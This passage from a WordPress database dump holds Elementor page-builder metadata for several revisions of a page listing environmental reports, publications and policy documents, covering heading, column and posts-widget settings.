id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27832,4041,'_elementor_edit_mode','builder'),(27833,4041,'_elementor_template_type','wp-page'),(27834,4041,'_elementor_version','3.4.0'),(27835,4041,'_wp_page_template','default'),(27836,4041,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27838,4041,'_elementor_pro_version','3.3.6'),(27840,4042,'_elementor_edit_mode','builder'),(27841,4042,'_elementor_template_type','wp-page'),(27842,4042,'_elementor_version','3.4.0'),(27843,4042,'_wp_page_template','default'),(27844,4042,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27846,4042,'_elementor_pro_version','3.3.6'),(27848,4043,'_elementor_edit_mode','builder'),(27849,4043,'_elementor_template_type','wp-page'),(27850,4043,'_elementor_version','3.4.0'),(27851,4043,'_wp_page_template','default'),(27852,4043,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.702999999999999403144101961515843868255615234375},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.55499999999999971578290569595992565155029296875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27854,4043,'_elementor_pro_version','3.3.6'),(27857,4044,'_elementor_edit_mode','builder'),(27858,4044,'_elementor_template_type','wp-page'),(27859,4044,'_elementor_version','3.4.0'),(27860,4044,'_wp_page_template','default'),(27861,4044,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.702999999999999403144101961515843868255615234375},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.55499999999999971578290569595992565155029296875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38605,3877,'_elementor_css','a:6:{s:4:\"time\";i:1770877490;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:6:{i:0;s:7:\"fcfb3fd\";i:1;s:7:\"fcfb3fd\";i:2;s:7:\"c79f8b4\";i:3;s:7:\"fcfb3fd\";i:4;s:7:\"fcfb3fd\";i:5;s:7:\"c79f8b4\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(27863,4044,'_elementor_pro_version','3.3.6'),(27864,4045,'_elementor_edit_mode','builder'),(27865,4045,'_elementor_template_type','wp-page'),(27866,4045,'_elementor_version','3.4.0'),(27867,4045,'_wp_page_template','default'),(27868,4045,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.702999999999999403144101961515843868255615234375},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.55499999999999971578290569595992565155029296875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27870,4045,'_elementor_pro_version','3.3.6'),(27871,4046,'_elementor_edit_mode','builder'),(27872,4046,'_elementor_template_type','wp-page'),(27873,4046,'_elementor_version','3.4.0'),(27874,4046,'_wp_page_template','default'),(27875,4046,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.702999999999999403144101961515843868255615234375},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.55499999999999971578290569595992565155029296875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27877,4046,'_elementor_pro_version','3.3.6'),(27880,4047,'_elementor_edit_mode','builder'),(27881,4047,'_elementor_template_type','wp-page'),(27882,4047,'_elementor_version','3.4.0'),(27883,4047,'_wp_page_template','default'),(27884,4047,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.702999999999999403144101961515843868255615234375},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.55499999999999971578290569595992565155029296875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27886,4047,'_elementor_pro_version','3.3.6'),(27887,4047,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:5;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:6:\"layout\";i:1;}}}}s:5:\"posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:3:{s:14:\"section_layout\";a:7:{s:5:\"_skin\";i:1;s:20:\"custom_template_list\";i:1;s:20:\"custom_skin_template\";i:1;s:21:\"custom_posts_per_page\";i:1;s:18:\"custom_same_height\";i:1;s:14:\"custom_link_to\";i:1;s:15:\"custom_postlink\";i:1;}s:13:\"section_query\";a:2:{s:15:\"posts_post_type\";i:1;s:14:\"posts_query_id\";i:1;}s:18:\"section_pagination\";a:1:{s:15